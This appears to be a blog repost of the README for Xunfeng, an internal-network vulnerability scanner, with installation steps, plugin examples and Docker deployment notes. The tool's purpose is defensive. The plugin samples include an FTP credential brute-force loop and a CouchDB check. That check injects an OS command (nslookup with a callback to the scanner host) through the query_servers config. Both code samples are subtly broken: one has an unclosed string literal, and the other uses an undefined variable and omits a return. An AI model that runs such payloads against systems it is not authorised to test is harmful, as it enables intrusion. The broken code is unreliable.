51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

巡风:企业内网的漏洞快速应急巡航扫描系统

项目主页

https://github.com/Blacksmith-shop/xunfeng

简介

巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。

其主体分为两部分:网络资产识别引擎,漏洞检测引擎。

网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测(支持调用MASSCAN),并进行指纹识别,识别内容包括:服务类型、组件容器、脚本语言、CMS。

漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。

安装指南

基础环境需求:

  • Python 2.7
  • Mongodb v3.0.0

运行与安装过程需要在管理员权限下进行

官网国内下载较慢,我们提供了镜像地址

https://sec.ly.com/mirror/python-2.7.12.msi
https://sec.ly.com/mirror/python-2.7.12.amd64.msi
https://sec.ly.com/mirror/mongodb-linux-x86_64-ubuntu1604-3.4.0.tgz
https://sec.ly.com/mirror/mongodb-linux-x86_64-3.4.0.tgz
https://sec.ly.com/mirror/mongodb-win32-x86_64-2008plus-ssl-3.4.0-signed.msi

安装相关依赖:

CentOS
yum install gcc libffi-devel python-devel openssl-devel libpcap-devel
Ubuntu/Debian
sudo apt-get update && sudo apt-get install gcc libssl-dev libffi-dev python-dev libpcap-dev

安装python依赖库:

需先安装pip,建议使用豆瓣的pip源,否则可能会因为超时导致出错。 
wget https://sec.ly.com/mirror/get-pip.py --no-check-certificate
python get-pip.py
已经有pip需更新到最新版本
pip install -U pip
pip install pymongo Flask xlwt paramiko

Linux 部署流程

启动服务: {#0KSFindDIV}

nohup ./mongod --port 65521 --dbpath DBData &
# DBData为数据库指定存在目录

导入数据:

./mongorestore -h 127.0.0.1 --port 65521 -d xunfeng db
# 2.x版本 MongoDB 这一步会报错,因为不支持全文索引,所以得用 MongoDB 3.x版本,

增加认证:

./mongo --port 65521
use xunfeng
db.createUser({user:'scan',pwd:'your password',roles:[{role:'dbOwner',db:'xunfeng'}]})
exit
# 请将pwd换为你设定的密码。

停止服务:

kill -9 $(pidof mongod)

修改时区:

echo TZ\='Asia/Shanghai'\; export TZ >> ~/.bash\_profile
source ~/.bash\_profile

启动服务: {#1KSFindDIV}

根据实际情况修改Conifg.py和Run.sh文件
sh Run.sh 启动服务。

Windows 部署流程

启动服务: {#3KSFindDIV}

mongod.exe --port 65521 --dbpath DBData
# DBData为数据库指定存在目录。

导入数据:

mongorestore.exe -h 127.0.0.1 --port 65521 -d xunfeng db

增加认证:

./mongo --port 65521
use xunfeng
db.createUser({user:'scan',pwd:'your password',roles:[{role:'dbOwner',db:'xunfeng'}]})
exit
# 请将pwd换为你设定的密码。

停止服务:

Ctrl + c 关闭mongodb服务

启动服务: {#4KSFindDIV}

根据实际情况修改Conifg.py和Run.bat文件。
运行Run.bat 启动服务。

配置指南

  • 在配置-爬虫引擎-网络资产探测列表 设置内网IP段(必须配置,否则无法正常使用)。
  • 在配置-爬虫引擎-资产探测周期 设置计划规则。
  • 可启用MASSCAN(探测范围为全端口)代替默认的端口探测脚本,需安装好MASSCAN后配置程序完整绝对路径,点击开启即可完成切换。
  • 其他配置根据自身需要进行修改。

插件编写

漏洞插件支持2种类型,标示符与python脚本,可以通过官方推送渠道安装或者自行添加。

JSON标示符

例子

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第1张

Python脚本

插件标准非常简洁,只需通过 get_plugin_info方法定义插件信息,check函数检测漏洞即可。

# coding:utf-8
import ftplib
def get_plugin_info(): # 插件描述信息
 plugin_info = {
 "name": "FTP弱口令", 
 "info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。",
 "level": "高危",
 "type": "弱口令",
 "author": "wolf@YSRC",
 "url": "",
 "keyword": "server:ftp", # 推荐搜索关键字
 }
 return plugin_info
def check(ip, port, timeout): # 漏洞检测代码
 user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web']
 for user in user_list:
 for pass_ in PASSWORD_DIC: # 密码字典无需定义,程序会自动为其赋值。
 pass_ = str(pass_.replace('{user}', user))
 try:
 ftp = ftplib.FTP()
 ftp.timeout = timeout
 ftp.connect(ip, port)
 ftp.login(user, pass_)
 if pass_ == '': pass_ = "null"
 if user == 'ftp' and pass_ == 'ftp: return u"可匿名登录"
 return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) # 成功返回结果,内容显示在扫描结果页面。
 except:
 pass

此外系统内嵌了辅助验证功能:

DNS:触发,nslookup randomstr IP,验证, http://ip/randomstr ,返回YES即存在。

HTTP:触发,http://ip/add/randomstr ,验证, http://ip/check/randomstr ,返回YES即存在。

使用例子:

import urllib2
import random
import socket
def get_plugin_info(): # 插件描述信息
 plugin_info = {
 "name": "CouchDB未授权访问", 
 "info": "导致敏感信息泄露,攻击者可通过控制面板执行系统命令,导致服务器被入侵。",
 "level": "高危",
 "type": "未授权访问",
 "author": "wolf@YSRC",
 "url": "",
 "keyword": "server:couchdb", # 推荐搜索关键字
 }
def get_ver_ip():
 csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 csock.connect(('8.8.8.8', 80))
 (addr, port) = csock.getsockname()
 csock.close()
 return addr
def random_str(len):
 str1=""
 for i in range(len):
 str1+=(random.choice("ABCDEFGH1234567890"))
 return str(str1)
def check(ip,port,timeout):
 rand_str = random_str(8)
 cmd = random_str(4)
 server_ip = get_ver_ip()
 req_list = [
 ["/_config/query_servers/%s"%(cmd),'"nslookup %s %s>log"'%(rand_str,server_ip)],
 ["/vultest123",''],
 ["/vultest123/test",'{"_id":"safetest"}']
 ]
 for req_info in req_list:
 try:
 request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout)
 request.get_method = lambda: 'PUT'
 urllib2.urlopen(request)
 except:
 pass
 try:
 req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s","map":""}'%(cmd))
 req_exec.add_header("Content-Type","application/json")
 urllib2.urlopen(req_exec)
 except:
 pass
 check = urllib2.urlopen("http://%s/%s"%(server_ip,rand_str)).read()
 if 'YES' in check:
 return u"未授权访问"

流程演示

视频地址:http://v.youku.com/v_show/id_XMTg2NTcyNjE2NA==.html

文件结构

│ Config.py # 配置文件
│ README.md # 说明文档
│ Run.bat # Windows启动服务
│ Run.py # webserver
│ Run.sh # Linux启动服务,重新启动前需把进程先结束掉
│ 
├─aider
│ Aider.py # 辅助验证脚本
│ 
├─db # 初始数据库结构
│ 
├─masscan # 内置编译好的Masscan程序(CentOS win64适用),需要chmod+x给执行权限(root),若无法使用请自行编译安装。。 
├─nascan
│ │ NAScan.py # 网络资产信息抓取引擎
│ │ 
│ ├─lib
│ │ common.py 其他方法
│ │ icmp.py # ICMP发送类
│ │ log.py # 日志输出
│ │ mongo.py # 数据库连接
│ │ scan.py # 扫描与识别
│ │ start.py # 线程控制
│ │ 
│ └─plugin
│ masscan.py # 调用Masscan脚本
│ 
├─views
│ │ View.py # web请求处理
│ │ 
│ ├─lib
│ │ Conn.py # 数据库公共类
│ │ CreateExcel.py # 表格处理
│ │ Login.py # 权限验证
│ │ QueryLogic.py # 查询语句解析
│ │ 
│ ├─static #静态资源目录
│ │ 
│ └─templates #模板文件目录
│ 
└─vulscan
 │ VulScan.py # 漏洞检测引擎
 │ 
 └─vuldb # 漏洞库目录

截图

首页

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第2张

自定义搜索

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第3张

新增目标/任务

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第4张

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第5张

插件管理

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第6张

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第7张

统计

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第8张

爬虫引擎/扫描引擎

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第9张

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第10张

搭建简要记录

安装环境

Ubuntu14.04 x64 TSL系统

安装过程

1、安装python库

pip install pymongo Flask xlwt paramiko

2、下载mongoDB、巡风代码

wget https://sec.ly.com/mirror/mongodb-linux-x86_64-ubuntu1404-3.4.0.tgz
wget https://github.com/ysrc/xunfeng/archive/master.zip

3、解压mongoDB、巡风代码

tar -zxvf mongodb-linux-x86_64-ubuntu1404-3.4.0.tgz
apt-get install unzip -y 
unzip master.zip

4、配置mongoDB、巡风数据库、日志目录

创建数据库目录:
mkdir /home/CF_HB/xunfengScanDB
移动mongodb
mv /home/CF_HB/mongodb-linux-x86_64-ubuntu1404-3.4.0 /opt/mongodb3.4/
初始化
nohup ./opt/mongodb3.4/mongod --port 65521 --dbpath /home/CF_HB/xunfengScanDB &
导入数据库
./opt/mongodb3.4/mongorestore -h 127.0.0.1 --port 65521 -d xunfeng /home/CF_HB/xunfeng-master/db
配置认证:
./opt/mongodb3.4/mongo --port 65521
use xunfeng
db.createUser({user:'scan',pwd:'CFHB@@@@@@@',roles:[{role:'dbOwner',db:'xunfeng'}]})
exit
创建日志目录
mkdir /var/log/xunfeng

5、修改时区

echo TZ\='Asia/Shanghai'\; export TZ >> ~/.bash\_profile
source ~/.bash\_profile

6、修改mongodb的连接密码-Config.py的第10行

vi /home/CF_HB/xunfeng-master/Config.py
class Config(object):
 ACCOUNT = 'admin'
 PASSWORD = 'xunfeng321' 这里是http://127.0.0.1:80/的登陆密码
class ProductionConfig(Config):
DB = '127.0.0.1'
PORT = 65521
DBUSERNAME = 'scan'
DBPASSWORD = 'CFHB@@@@@@@' 你的密码在这里修改
DBNAME = 'xunfeng'

7、修改Run.sh文件

vi /home/CF_HB/xunfeng-master/Run.sh
#!/bin/bash
CURRENT_PATH=`dirname $0`
cd $CURRENT_PATH
XUNFENG_LOG=/var/log/xunfeng 这里是日志目录
XUNFENG_DB=/home/CF_HB/xunfengScanDB 这里配置MongoDB的路径
[ ! -d $XUNFENG_LOG ] && mkdir -p ${XUNFENG_LOG}
[ ! -d $XUNFENG_DB ] && mkdir -p ${XUNFENG_DB}
下面这里配置了mongodb的绝对路径,或者添入环境变量也可以
nohup /opt/mongodb3.4/bin/mongod --port 65521 --dbpath=${XUNFENG_DB} --auth > ${XUNFENG_LOG}/db.log &
nohup python ./Run.py > ${XUNFENG_LOG}/web.log &
nohup python ./aider/Aider.py > ${XUNFENG_LOG}/aider.log &
nohup python ./nascan/NAScan.py > ${XUNFENG_LOG}/scan.log &
nohup python ./vulscan/VulScan.py > ${XUNFENG_LOG}/vul.log &

8、启动

sudo sh /home/CF_HB/xunfeng-master/Run.sh

使用效果:

巡风:企业内网的漏洞快速应急巡航扫描系统_https://www.tiejiang.org_站长之家_第11张

PS: 可以在Run.py里面自己修改端口,Author:CF_HB@MottoIN Team

Docker版本

项目地址

https://github.com/atiger77/XunFeng_Docker

部署方式

1.文件介绍

  • mongoauth.txt mongo认证文件
  • Config.py Flask的配置文件,其中存放mongo密码要与上一个文件保持一致
  • MongoDB-org-3.2.repo mongodb的repo文件
  • Run.sh 执行文件,在docker启动后会执行 Dockerfile docker镜像生产文件

2.部署方式

a. 下载全部文件

$git clone git@github.com:atiger77/XunFeng_Docker.git

b. 修改密码后生成镜像

#docker build -t "xunfeng:v1" .

c. 启动镜像

#docker run -d -p 80:80 -d /var/log/xunfeng:/var/log/xunfeng xunfeng:v1

想说的话

这个项目对于中小型的公司而言是个很好的福利,感谢同程的开源分享精神。这里用docker的好处是不需要复杂的环境依赖,起一个容器就可以使用,如果想长期使用还是建议部署在物理机上,docker不适合跑有状态的服务且不方便以后的扩展,想试试看这款扫描器的话倒是可以用容器玩一玩,我的dockerfile还可以继续改进如果有兴趣你可以继续fork去改一改。也是希望有越来越多的好的开源安全项目。

赞(0)
未经允许不得转载:工具盒子 » 巡风:企业内网的漏洞快速应急巡航扫描系统